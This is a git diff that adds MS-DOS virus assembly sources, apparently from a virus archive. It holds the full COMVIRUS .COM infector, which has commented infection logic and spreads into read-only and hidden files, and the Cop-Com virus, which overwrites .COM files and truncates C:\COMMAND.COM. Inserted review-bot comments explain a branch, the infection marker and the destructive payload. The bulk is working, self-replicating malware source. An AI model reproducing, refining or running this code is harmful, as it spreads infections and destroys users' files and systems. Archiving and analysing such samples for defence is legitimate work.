+ mov al,[bx]
+ mov si,ax
+ mov al,cs:cod[si]
+ mov dl,cs:len[si]
+ mov cl,dl
+ cmp dl,7
+ jne lu20
+ inc ah
+lu20: sub cl,ch
+ shl ax,cl
+ or bp,ax
+ add ch,16
+ sub ch,dl
+ mov cl,8
+lu30: cmp ch,cl
+ jc lu40
+ mov ax,bp
+ shl bp,cl
+ mov es:[di],ah
+ dec di
+ sub ch,cl
+ jmp short lu30
+lu40: dec bx
+ cmp bx,0ffffh
+ jne lu10
+ mov ax,bp
+ mov es:[di],ah
+ ret
+uha endp
+
+fill proc near
+ sub si,si
+ mov cx,0100h
+lf10: mov ax,si
+ mov cs:asc[si],al
+ inc si
+ loop lf10
+ sub bx,bx
+ mov cx,5000h
+lf20: mov al,[bx]
+ mov si,ax
+ shl si,1
+ inc cs:tbl[si]
+ inc bx
+ loop lf20
+ ret
+fill endp
+
+pause proc near
+ push ax
+ mov ah,01h
+ int 21h
+ pop ax
+ ret
+pause endp
+
+sort proc near
+ mov cx,00ffh
+l10: mov di,cx
+ mov bx,cx
+ shl bx,1
+ add bx,offset tbl
+ sub ax,ax
+l20: mov si,ax
+ shl si,1
+ mov dx,tbl[si]
+ cmp dx,[bx]
+ jnc l30
+ xchg dx,[bx]
+ xchg dx,tbl[si]
+ shr si,1
+ mov dl,asc[si]
+ xchg dl,asc[di]
+ xchg dl,asc[si]
+l30: inc ax
+ cmp ax,cx
+ jc l20
+ loop l10
+ ret
+sort endp
+
+make proc near
+ mov cx,16
+ mov bx,offset dat
+ sub si,si
+ sub ax,ax
+lm10: mov al,asc[si]
+ mov di,ax
+ mov dx,si
+ add
dl,[bx]
+ mov cod[di],dl
+ mov dl,[bx+1]
+ mov len[di],dl
+ inc si
+ cmp si,cx
+ jnz lm10
+ inc bx
+ inc bx
+ shl cx,1
+ cmp cx,512
+ jnz lm10
+ ret
+make endp
+
+build proc near
+ call fill
+ mov ax,cs
+ mov ds,ax
+ call sort
+ call make
+ ret
+build endp
+
+write proc near
+ mov dx,offset fn2
+ mov al,02h
+ mov ah,3dh
+ int 21h
+ jc sw
+ mov bx,ax
+ mov ax,es
+ mov ds,ax
+ sub dx,dx
+ mov cx,5000h
+ mov ah,40h
+ int 21h
+ jc sw
+ mov ah,3eh
+ int 21h
+sw: ret
+write endp
+
+read proc near
+ mov dx,offset fn1
+ mov al,00h
+ mov ah,3dh
+ int 21h
+ jc sr
+ mov bx,ax
+ mov ax,ds
+ add ax,1000h
+ mov ds,ax
+ sub dx,dx
+ mov cx,5000h
+ mov ah,3fh
+ int 21h
+ jc sr
+ mov ah,3eh
+ int 21h
+sr: ret
+read endp
+
+
+last label byte
+code ends
+ end prog
+
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.comvirus.asm b/MSDOS/Virus.MSDOS.Unknown.comvirus.asm
new file mode 100644
index 00000000..e50cc167
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.comvirus.asm
@@ -0,0 +1,458 @@
+title COMVIRUS
+subttl By Drew Eckhardt
+subttl Latest revision: 4-28-1991
+
+;The author of this virus intends it to be used for educational
+;purposes only, and assumes no responsibilities for its release,
+;dammages resulting from its use, including but not limited to
+;equipment dammage or data loss.
+
+;By assembling or examining this program, The user agrees to accept all
+;responsibility for this programs use, or any portions of the code
+;or concepts contained within. The user also agrees to not publicly release
+;this virus, and to exercise necessary precautions to prevent its escape.
+;The user accepts all responsibility arising from his actions.
+
+;Don't come crying to me if your hard disk gets infected,
+;as THERE IS NO ANTIDOTE. HAHAHAH.
+
+
+;Revision history:
+;4-13: initial bug-free release, size=424 bytes with carrier
+
+;4-15: added no date change support, size=438 bytes with carrier
+
+;4-16: minor documentation changes, size=438 bytes with carrier,
+; NO CODE CHANGE from 4-15 revision
+
+;4-21: fixed missing hex h suffixs, made MASM friendly,
+; fixed incorrect assume statement (assume statements are ignored
+; by A86) enabled hard/floppy infection based on floppy_only status
+; size=438 bytes IF floppy_only, 424 bytes if not, with carrier.
+; minimum virus length = 419 bytes
+
+;4-23: added control over how many programs are infected per run,
+; switched method of infection, from copying to DTA then writing
+; to disk to straight write to disk from memory.
+; size=412 bytes IF floppy_only, 398 bytes if not, with carrier.
+; minimum virus length = 393 bytes
+
+;4-28: used set DTA instead of default DTA/copy command line
+; buffer, which had been used based on incorrect assumption
+; eliminated calls to get time/date, get attribs
+; by using information from find first/find next functions 4eh/4fh
+; made warning optional for reduced space if desired. Also
+; changed mov reg16, bp add reg16, constant to shorter LEA instruction.
+; size=354 bytes IF floppy_only, warning on W/carrier
+; 340 bytes IF w/warning & carrier program
+; 286 bytes w/o warning, in program
+; minimum virus length = 281 bytes for virus itself
+
+;4-28pm: instead of near CALL-pop sequences everywhere, switched to
+; a single CALL near ptr Reference_Point, putting the result into
+; si now that (until the end) string mode addressing is not used.
+; Changed places where a register (used as an index)
+; was being loaded THEN added to a single LEA isntruction
+; size = 340 bytes if floppy_only, warning on w/carrier
+; size = 326 bytes if w/warning & carrier
+; size = 272 w/o warning
+; minimum virus length = 267 bytes for the virus itself
+
+;4-28pm2: Eliminated unecessary flush buffers call.
+; size = 336 bytes if floppy_only w/carrier
+; size = 322 bytes w/warning & carrier
+; size = 268 w/o warning
+; minimum virus length = 263 bytes for virus itself
+
+;4-30: restored 5 bytes of original code at CS:0100
+; before infecting other programs, allowing the
+; original code field to be modified so one disk write could be
+; used instead of two
+; minor documentation revisions - corrected incorrect
+; opcodes in documentation
+; size = 326 bytes if floppy_only w/carrier
+; size = 312 bytes w/warning & carrier program
+; size = 258 bytes w/carrier program
+; Minimum virus length = 253 bytes for the virus itself
+
+;NOTE: The program is currently "set up" for A86 assembly with all
+;conditional assembly symbols. #IF and #ENDIF should be replaced with
+;MASM IFDEF and ENDIF directives for propper operation.
+;Also, instead of using EQUates to define control symbols, the /D
+;option or DEFINE could be used.....
+
+
+;COMVIRUS.ASM must be assembled into a .COM file inorder to function
+;properly. For convieniece, I recommend an assembler like A86 that will
+;assemble to a .COM file without having to go through LINK and EXE2BIN
+
+;As is, it will infect .COM files located on the current disk.
+;ONLY if it is a floppy disk, ONLY in the root directory.
+
+;This is a .COM infector virus, which, does nothing other than print a
+;warning message, and spread to all files on the default disk IFF it is
+;a floppy disk, in the root directory.
+
+;Theory:
+;This is a non - overwriting virus. I took special precautions to preserve
+;all functionality of the original program, including command line, parsed FCB,
+;and segment register preservation. This makes the virus harder to detect.
+
+;The .COM file is a memory image - with no relocation table. Thus, it
+;is an easy target for a virus such as this.
+
+;Infected file format
+;jmp near ptr xxxx
+;cli cli ;ID bytes
+;ORIGINAL program code, sans 5 bytes
+;5 bytes ORIGINAL program code
+;VIRUS
+
+;This format makes infection VERY simple. We merely check for our signature
+;(in this case cli cli (fa fa) - instructions that no programmer in his
+;right mind would use - loading the original five bytes in the process.
+;These original bytes are written to the end of the program, then
+;A jump to where the virus is.
+
+;While infection is easy, this method presents some coding problems, as the
+;virus does not know where in memory it is. Therefor, When we want to access
+;data, we FIND OUT where we are, by performing a near call which PUSHES ip to the
+;stack which is then popped. Addresses are then calculated relative to this
+;via LEA
+
+;To run the program as normal, command line is restored, registers restored,
+;And original code copied onto the first five bytes of the program.
+
+
+;Program control symbols defined here
+floppy_only equ 1
+infect_per_run equ 1 ;number of programs infected per run
+warn_user equ 1
+
+_TEXT segment byte 'CODE'
+ assume cs:_TEXT,ds:_TEXT,es:_TEXT,ss:_TEXT
+ org 100h
+
+Start: jmp infect;
+
+;This is our signature
+ cli
+ cli
+
+;Original code is the data field where we store the original program code
+;which will replace our signature and jmp to infect
+
+Original_Code: int 20h ;five bytes that simply terminate
+ nop ;the program
+ nop
+ nop
+
+
+
+;Data for the virus. In a destructive virus, you would want to encrypt
+;any strings using a simple one's complement (not) operation so as to
+;thwart detection via text search utilities. Since we want detection to
+;be easy, this un-encrypted form is fine.
+
+
+Start_Virus:
+#IF warn_user
+ Warning db "This file infected with COMVIRUS 1.0",10,13,'$'
+#ENDIF
+
+;VirusMask is simply an ASCIIZ terminated string of the files we wish to
+;infect.
+
+ VirusMask db '*.COM', 0
+Infect:
+ push ax ;on entry to a .COM program, STACK:
+ ;MS-DOS puts drive identifiers ax (drive id for FCB's) <-- sp
+ ;for the two FCB's in here. Save
+ ;'em
+
+ ;I use special trickery to find location of data. Since
+ ;NEAR calls/jmps are RELATIVE, call near ptr find_warn is
+ ;translated to e8 0000 - which will simply place the location
+ ;of Reference onto the stack. Our data can be found relative to
+ ;this point.
+
+ call near ptr Reference ;All data is reference realative to
+ ;Reference
+
+
+Reference: pop bx ;which is placed into bx for LEA
+ ;instructions
+ ;bx now contains the REAL address of
+ ;Reference
+ ;si points to real address of original
+ ;code field
+ lea si, [bx-(offset Reference - offset Original_Code)]
+ mov di, 0100h ;original code is at 100h
+ mov cx, 5 ;5 bytes
+ cld ;from start of buffer
+ rep movsb ;do it
+
+ mov si, bx ;since BX is used in handle
+ ;based DOS calls, for the remainder
+ ;of the virus, si will contain the
+ ;actual address of reference
+
+#IF warn_user
+
+ ;Always calculate the address of data relative to known Reference
+ ;Point
+ lea dx, [si-(offset Reference - offset Warning)]
+ mov ah,9h ;DO dos call, DS:DX pointing
+ int 21h ;to $ terminated string
+
+ ;We want to make sure that the user gets the message
+
+WaitForKey:
+ mov ah, 0bh ;we will wait for a keypress
+ int 21h ;signifying the user has
+ or al, al ;seen the message.
+ jz WaitForKey
+
+#ENDIF
+
+#IF FLOPPY_ONLY
+
+ ;Since this is a simple demonstration virus, we will only infect
+ ;.COM files on the default drive IFF it is a floppy disk....
+ ;So, we will get information about the disk drive.
+
+
+ push ds ;ds:bx returns a byte to
+ ;media descriptor
+
+ mov ah, 1bh ;get disk information STACK
+ int 21h ;DOIT ax (drive ID's)
+ cmp byte ptr ds:[bx], 0f8h ;see if its a hard disk ds <--sp
+
+ pop ds ;restore ds STACK
+ jne Floppy ;if it was hard.... ax <--sp
+ jmp near ptr done ;we're nice guys and are done
+
+Floppy: ;Since it was floppy, we can go on with the infection!
+#ENDIF
+ ;The default DTA, as is will give us problems. The designers of
+ ;MickeySoft DOS decided to put default DTA at ofset 128 in
+ ;the PSP. PROBLEM: This is also where the user's precious command
+ ;line is, and we MUST remain undectected. SO.... we allocate a
+ ;DTA buffer on the stack. 43 bytes are needed, 44 will do.
+
+ sub sp, 44 ;allocate space for findfirst/findnext DTA
+ mov bp, sp ;set up bp as a reference to this area
+
+ ;Set the DTA
+ mov dx, bp ;point DS:DX to our area
+ mov ah, 1ah ;set DTA
+ int 21h
+
+ ;Set up pointers to data in DTA
+ dta equ word ptr [bp]
+ file_name equ word ptr [bp+1eh]
+ attributes equ byte ptr [bp+15h]
+ time_stamp equ word ptr [bp+16h]
+ date_stamp equ word ptr [bp+18h]
+ file_size equ dword ptr [bp+1ah]
+
+ ;We dynamically allocate a variable to store the number of programs STACK
+ ;The virus has infected. FCB drives
+ ; bp--> 44 byte DTA
+ infected_count equ byte ptr[bp-2]; Infected_Count
+ xor ax, ax ;zero variable, sp--> buffer (6 bytes)
+ push ax ;allocate it on the stack
+ sub sp, 6 ;allocate small buffer
+
+ ;Now, we begin looking for files to infect.
+ lea dx, [si - (offset Reference - offset VirusMask)]
+ ;DS:DX points to the search string STACK
+ mov ah, 4eh ;find first matching directory entry FCB drives (word)
+ mov cx, 111b ;only default directory, FILES
+ ;hidden, system and normal
+ int 21h ;doit bp--> 44 byte DTA buffer
+ ; infected count (word)
+ jnc Research ;carry is clear when a file was sp--> 6 byte buffer
+ jmp nofile ;found.
+
+
+ReSearch:
+;All handle based DOS calls take a pointer to an ASCIIZ file name in ds:dx
+ lea dx, file_name
+
+;Since this is a virus, we want to infect files that can't be touched by
+;DOS commands, this means readonly, system, and hidden files are at our
+;mercy. To do this, we rely on the findfrst/next attributes and other data
+;to restore the attribute byte to the original settings. get/SET can fix
+;them to be suitable
+ mov cl, attributes
+ and cl, 11100000b ;not readonly, system, or hidden STACK
+ ; FCB drives
+ mov ax, 4301h ;set attributes bp--> buffer (44 bytes)
+ int 21h ; buffer (6 bytes)
+ ; sp--> infected_count
+ jnc NoError ;check for error
+ jmp Restore_Flags
+NoError:
+ mov ax, 3d02h ;now, open file using handle,
+ ;read/write access
+ int 21h ;
+ jnc NoError2 ;IF there was an error, we are done
+ jmp Restore_Flags ;But we don't need to commit or close
+
+NoError2:
+ mov bx, ax ;The handle was returned in ACC.
+ ;Howwever, all handle based DOS
+ ;calls expect it in BX
+
+
+;We don't want to infect the program more than once, so we will
+;check to see if it is infected.
+
+
+ mov ax, 4200h ;seek relative to start of file
+ ; bx contains handle from open operation
+ xor cx,cx ;cx:dx is file pointer
+ xor dx, dx ;
+ int 21h ;DOIT
+
+;Now, we will read in enough data to see if we have our virus signature.
+ mov ah, 3fh ;read data
+ lea dx, [si-(offset reference-offset original_code)]
+ ;into original_code buffer
+ mov cx, 5 ;5h bytes
+ ; bx contains handle from last operation
+ int 21h
+
+ cmp word ptr [si-(offset reference-offset original_code)+3], 0fafah
+ jne GoApe ;if we aren't already infected,
+ jmp Error ;go for it
+
+GoApe:
+;Since it is safe to infect, we will
+ mov ax, 4202h ;seek end of file
+ xor cx, cx
+ xor dx, dx
+ int 21h
+
+ or dx, dx ;check for valid .COM format
+ jz Less_Than_64K
+ jmp Error
+
+Less_Than_64K:
+
+;Now, we must calculate WHERE the jump will be to. Let's examine the program
+;Structure:
+;jmp near ptr xxxx
+;Cli Cli }These add up to the original length
+;Orignal code sans 5 bytes
+
+;Original_Code (5 bytes) }The length of all virus data
+;Other virus data is equal to the difference in
+;Infect the addresses of Infect and Original_Code
+
+;End_Virus
+
+
+;Thus, the jump must jump TO (offset Infect- offset Original_Code + Original_Length + origin)
+;However, in the 80x86, NEAR jumps are calculated as an offset from the position
+;of the next statement to execute (because of fetch/execute cycle operation).
+
+;Since jmp near ptr xxxx takes 3 bytes, the next instruction is THREE bytes from
+;The 0E9h jmp near instruction, so xxxx will be (offset Infect-Offset Original_Code
+;+Original_Length-3);
+
+ ;Since AX already contains the original length, we will merely add
+ ;Space for the virus data, and take care of the three bytes
+ ;of code generated by the jmp near instruction.
+
+ add ax, (offset Infect - Offset Original_Code -3)
+
+ ;calculate jump address
+ mov byte ptr [bp-8], 0e9h ;jmp near instruction
+ mov word ptr [bp-7], ax ;offset for near jmp
+ mov word ptr [bp-5], 0fafah ;cli cli
+
+ mov ax, 4200h ;seek begining of file
+ xor cx, cx
+ mov dx, cx
+ int 21h
+
+ mov ah, 40h ;write patched code
+ mov cx, 5 ;5 bytes of code
+ lea dx, [bp-8] ;our buffer
+ int 21h
+
+ mov ax, 4202h ;seek EOF
+ xor cx, cx
+ xor dx, dx
+ int 21h
+
+
+ lea dx, [si - (offset Reference - offset Original_Code)]; set start
+ mov cx, (offset End_Virus - offset Original_Code) ;set length
+ mov ah, 40h ;append virus to file
+ int 21h ;doit
+
+ inc infected_Count ;bump up the number of programs infected
+
+Error: mov dx,date_stamp ;restore date
+ mov cx,time_stamp ;restore time
+ mov ax, 5701h ;set them
+ int 21h
+
+ mov ah, 3eh ;close file
+ int 21h
+
+Restore_Flags:
+ xor ch, ch ;zero hi byte flags
+ mov cl,attributes ;restore flags
+ lea dx, file_name ;ds:dx points to ASCIIZ string
+ ;in the buffer, offset 1eh contains
+ ;the file name
+ mov ax, 4301h ;get/SET flags
+ int 21h ;Doit
+
+DoAgain:;See if we're done infecting
+ cmp infected_count, infect_per_run
+ jae NoFile ;if we're done, same as no new file
+
+
+ mov ah, 4fh ;find next
+ int 21h
+
+ jc NoFile ;if carry is clear, DOIT again!
+ jmp ReSearch
+
+;Since we have no more files, we will restore things to normal.
+NoFile:
+ mov dx, 80h ;reset default dta at DS:80h
+ mov ah, 1ah ;set DTA
+ int 21h
+
+ add sp, 52 ;deallocate buffers and infected_count
+
+
+
+;Put original code of program BEFORE it was infected back in place!
+
+
+Done:
+ pop ax ;restore ax
+
+
+ ;FUNKY code! In the 80x86, all NEAR or SHORT jmp opcodes take
+ ;a RELATIVE address...... BUT a retn opcode pops a near absolute
+ ;address of the stack - saves us the trouble of some calculating
+ ;relative to here, and the trouble of a self-modifying
+ ;far absolute jmp! (5 bytes)
+
+ mov bx, 0100h
+ push bx
+ ret ;easiest jump to cs:100
+
+End_Virus:
+_TEXT ends
+end start
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.copcom.asm b/MSDOS/Virus.MSDOS.Unknown.copcom.asm
new file mode 100644
index 00000000..deb130ca
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.copcom.asm
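Review bot: The comment on `jc NoFile` under `DoAgain` reads `;if carry is clear, DOIT again!`, but the instruction it annotates branches when carry is set, i.e. when function 4fh reports no further match; the repeat path is the fall-through `jmp ReSearch`. A comment that describes the branch it sits on, e.g. `jc NoFile ;carry set: no more matches, restore the DTA and finish`, avoids the inversion. The earlier `jnc Research ;carry is clear when a file was found` pair is consistent and needs no change.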
@@ -0,0 +1,103 @@
+;
+; Cop-Com Virus
+;
+ Org 100h
+
+Main: Xor Cx,Cx
+On1: Call CritErr
+ Inc Cx
+ Cmp Cx,10
+ Jb Infect
+ Push Cs
+ Pop Ds
+ Mov Ah,3ch
+ Lea Dx,Command
+ Xor Cx,Cx
+ Int 21h
+ Mov Ah,9
+ Lea Dx,Msg
+ Int 21h
+ Jmp ShutDown
+;
+; Infection procedure
+;
+Infect: Push Cx
+ Mov Ah,4eh
+ Push Cs
+ Pop Ds
+NextFile: Xor Cx,Cx
+ Lea Dx,COMFILE
+ Int 21h
+ Jc Einde
+ Mov Ax,Cs:[96h]
+ And Ax,1fh
+ Cmp Ax,1fh
+ Jne Do_It
+ Mov Ah,4fh
+ Jmp NextFile
+Do_It: Mov Ax,3d02h
+ Mov Dx,9eh
+ Int 21h
+ Xchg Ax,Bx
+ Mov Ax,5700h
+ Int 21h
+ Push Cx
+ Push Dx
+ Mov Ah,40h
+ Mov Dx,100h
+ Mov Cx,VirLen
+ Int 21h
+ Pop Dx
+ Pop Cx
+ Or Cx,1fh
+ Mov Ax,5701h
+ Int 21h
+ Mov Ah,3eh
+ Int 21h
+Einde: Pop Cx
+ Jmp On1
+
+;
+; Routine for calling the critical error handler
+;
+CritErr: Mov Ah,19h
+ Int 21h
+ Xor Dx,Dx
+ Mov Ds,Dx
+ Mov Ah,3ah
+ Pushf
+ Call Dword ptr Ds:[90h]
+ Cmp Al,2
+ Jae ShutDown
+ Ret
+
+
+;
+; Terminate routine
+;
+ShutDown: Mov Ax,4c00h
+ Int 21h
+
+
+;
+; Activate message
+;
+Msg Db 13,10,'Program halted by Cop-Com'
+ Db 13,10,'Unauthorized program on your system'
+ Db 13,10,'Consult Local dealer for support'
+ Db 13,10,'$'
+
+ Db '> (C) Business Software Alliance <'
+
+;
+; Filespecs
+;
+Command Db 'C:\COMMAND.COM',0
+COMFILE Db '*.COM',0
+
+VirLen Equ $-Main
+
+; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪
+; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪
+; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
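Review bot: The header comment never states what the `And Ax,1fh` / `Cmp Ax,1fh` test at `NextFile` keys on: `Cs:[96h]` appears to be the time word of the default DTA at PSP:80h (offset 16h), and `Or Cx,1fh` ahead of the 5701h call stores a file time whose 2-second field is 1fh, so a time stamp already carrying that value is what makes the loop skip a file. That is the on-disk artifact a triage note or scanner rule would look for, and it deserves a header line such as `; Marker: low 5 bits of the file time (seconds/2 field) set to 1fh`. The action reached after ten `On1` passes (`Mov Ah,3ch` on `Command`, a create/truncate of C:\COMMAND.COM, followed by the `Msg` text) is likewise only implied by the message and should be named in the header so a reader does not have to trace the `Cmp Cx,10` path to learn it.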